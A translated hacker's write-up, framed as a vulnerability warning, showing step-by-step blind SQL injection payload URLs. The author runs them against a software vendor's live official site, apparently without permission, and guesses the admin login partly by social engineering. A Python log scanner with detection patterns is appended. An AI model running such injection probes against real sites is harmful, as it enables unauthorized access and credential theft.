This piece was originally submitted to a magazine, but because of a problem with the manuscript it was never published. Recently some people have repeatedly speculated that I was picking on Blue Rain, so I am releasing it as a public vulnerability warning. As for the version: some of these SQL injection vulnerabilities still exist in the current release, so none of this has anything to do with me or the BCT team.
Recently, being bored, I was looking around and noticed that the current whole-site systems are more and more often modified versions of one another, and that the users of Blue Rain Design are also growing in number. The Blue Rain site system is a modification of NOWA 0.94, and Blue Rain is far from the only NOWA-based system; I will not list the others here. The core is the same; only the functions added on top differ. The only publicly known vulnerability in NOWA-based systems so far has been an upload vulnerability. The vulnerability in this article lies in the modified part of the NOWA system; the original NOWA has no SQL injection vulnerability. If the Blue Rain modification introduced an injection problem, can you blame me? Who told the programmers not to pay attention to security blind spots?
1. Determine the injection point. We test against the official website, because the downloadable version may not be the latest and that would affect the correctness of the article. First we submit http://***.net/view.asp?action=art&art_id=70 and 1=1, which returns the page shown in the first screenshot. Then we submit http://***.net/view.asp?action=art&art_id=70%20and%201=2, which returns the page shown in the second screenshot. Comparing the `and 1=1` and `and 1=2` responses with a standard SQL injection point, the two images tell us that this program has SQL injection. Since the current NOWA-based modified versions are built on an Access database, we already know the database type of this program.
2. Guess the database table. Because I am lazy, I wanted NBSI to do the injection work for me; everybody knows how powerful NBSI is, and using it here is like killing a chicken with a cow knife. Yet it did not detect any injection at the injection point I had found! Very surprising (hak_ban: Really... I really didn't want to inject manually T_T). NBSI didn't give me face, so I had to grit my teeth and inject manually. First, determine whether the table exists in the database. Construct and submit http://***.net/view.asp?action=art&art_id=70%20and%200<>(select%20count(*)%20from%20admin). The administrator table in most programs is named admin or adminuser, so we can guess it by anticipating the author's habits. After submitting the statement, the page returns normally, so we can confirm that the admin table exists in the database. We only need the administrator's account and password, so the other tables in the database can be ignored.
3. Guess the database fields. Before guessing, to save trouble and unnecessary suspicion, you should collect some information on the target website, such as the administrator's QQ number and the screen name the administrator uses, because people usually choose passwords and accounts that are easy to remember. The article pages and the other function pages show neither the article editor's name nor the administrator's QQ number, so I had to look in the BBS, where fortunately the user name "Blue Rain" turned up. So for the admin account we can try the Chinese name or its pinyin letters. (Hak_ban: I used to look up a PLMM's name and birthday on MSN. Everyone should pay attention to the importance of social engineering.) Less nonsense: what are the administrator fields of this program? First I guess the field Name: http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(name)>0) (HAK_BAN: *_* not a Name field!) After submitting the statement, the page does not display normally, confirming that there is no Name field in the admin table. It seems I have to think about how to guess; since the Name field does not work, try the admin_name field! Construct the guess again: http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)>0) (HAK_BAN: Is this the next one? I'll take it one step at a time!) After submitting the statement, the page returns normally, so finally one works. Then we start guessing the password field; in fact, from the above we can say with confidence that the password field is admin_password, so the submitted statement is http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_password)>0). The page returns normally. Right!?
Hahaha, the whole guessing is almost finished here! (Rookie: What? Where are the account and password? Are you stupid?) Guessing the account and password is more trouble and takes more time! OK, let's look at the account and password. First we guess the length of the account. Suppose the administrator's commonly used name "Blue Rain" is the administrator account. There are two possibilities: one is the pinyin "lanyu" of Blue Rain, the other is the Chinese characters, which would have to be guessed through their ASCII codes. Let's try the pinyin possibility first. If it is the pinyin, admin_name has length 5, so the submitted statement is http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)>5). The page does not display properly.
Then submit http://***.net/view.asp?action=art&art_id=70 and 1=(select count(*) from admin where len(admin_name)>4), and this page displays normally. Then submit the statement http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)=5), and we can determine that the length of admin_name is 5. The account length is out, but the length of the password we still don't know. According to the information collected, the program uses 16-bit MD5 encryption, so we guess a length of 16. Submit http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_password)=16). No screenshot for this one! We basically know: the account length is 5 and the password length is 16. (HAK_BAN: Honestly, I haven't injected manually for a long time; my back almost hurts!) As for what the account and password are, I will not list them further. The administrator account obtained from the social engineering guess, lanyu, is correct, and the password is indeed 16-bit MD5. The whole process can also be tested with the CSC injection tool.

4. Summary. There are several other SQL injection pages in the program, all in the function pages that Blue Rain added; the NOWA base is not involved in the SQL injection. If you are using this program, you can use a generic anti-injection script to protect it. Although the MD5 still has to be brute-forced, if you think it through, never mind cracking: your website may already have been taken over by someone. Network security is a very important part; I hope nobody underestimates it! If there are any mistakes, please point them out, and for any questions you can find me on the Non-Security forum or in the BCT group.
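From the defender's side, the probes walked through above leave a very recognisable trail in the web server access log, and the art_id parameter itself should never have accepted anything but an integer. The following Python is an added example, not code from the article or from NOWA/Blue Rain: it scans constructed IIS/Apache-style log lines for the boolean-based blind probes described above (`and 1=1` / `and 1=2`, `select count(*) from` subqueries, `len(...)` comparisons) and applies the allow-list check that a page like view.asp should enforce on art_id. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the article or any real
# server), modelled on the request pairs the article walks through.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2006:10:00:01 +0800] "GET /view.asp?action=art&art_id=70 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jan/2006:10:00:07 +0800] "GET /view.asp?action=art&art_id=70%20and%201=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jan/2006:10:00:09 +0800] "GET /view.asp?action=art&art_id=70%20and%201=2 HTTP/1.1" 200 812
203.0.113.5 - - [10/Jan/2006:10:01:30 +0800] "GET /view.asp?action=art&art_id=70%20and%200<>(select%20count(*)%20from%20admin) HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jan/2006:10:02:12 +0800] "GET /view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)>4) HTTP/1.1" 200 5120
198.51.100.9 - - [10/Jan/2006:10:03:00 +0800] "GET /view.asp?action=art&art_id=71 HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+)')

# Fingerprints of the boolean-based blind probes used in the article, matched
# against the URL-decoded, lower-cased parameter value.
PATTERNS = [
    ("and_const_compare", re.compile(r"\band\s+\d+\s*=\s*\d+")),
    ("count_subquery", re.compile(r"\(\s*select\s+count\s*\(\s*\*\s*\)\s+from\s+\w+")),
    ("len_probe", re.compile(r"\blen\s*\(\s*\w+\s*\)\s*(<>|[<>=])")),
]

def art_id_is_valid(raw):
    """Allow-list check the page should enforce: art_id must be a plain positive integer."""
    return raw.isdigit() and int(raw) > 0

def classify(value):
    """Return the names of every probe pattern found in one parameter value."""
    return [name for name, rx in PATTERNS if rx.search(value.lower())]

def scan(log_text):
    """Return one record per request whose art_id fails validation or matches a probe."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group("target")).query)
        art_id = params.get("art_id", [""])[0]   # parse_qs already URL-decodes the value
        tags = classify(art_id)
        if tags or not art_id_is_valid(art_id):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "art_id": art_id, "size": int(m.group("size")), "tags": tags})
    return findings
```

Running scan(SAMPLE_LOG) flags the four probe requests and leaves the two plain article views alone; the differing response size on the `and 1=2` request is the same signal the attacker relies on, and is worth correlating per source IP.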